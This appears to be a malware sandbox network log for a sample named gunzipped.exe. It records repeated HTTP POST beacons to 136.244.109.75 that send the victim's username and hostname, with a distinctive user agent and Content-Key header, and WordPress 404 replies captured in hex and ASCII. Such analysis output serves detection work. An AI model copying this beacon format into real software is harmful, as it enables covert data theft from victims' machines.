Apr 17, 2024 03:18:08.829883099 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:09.742115021 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:08 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:09.742176056 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:09.742213964 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:09.742253065 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:09.742295980 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:09.742336035 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:09.742374897 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:09.742440939 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:09.742480040 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:09.742527008 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49765	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:10.084964991 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:10.288512945 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:11.264024019 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:10 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:11.264091969 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:11.264163971 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:11.264202118 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:11.264245033 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:11.264283895 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:11.264322042 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:11.264384985 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:11.264424086 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:11.264467001 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49766	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:11.616139889 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:11.819884062 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:12.751744986 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:11 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 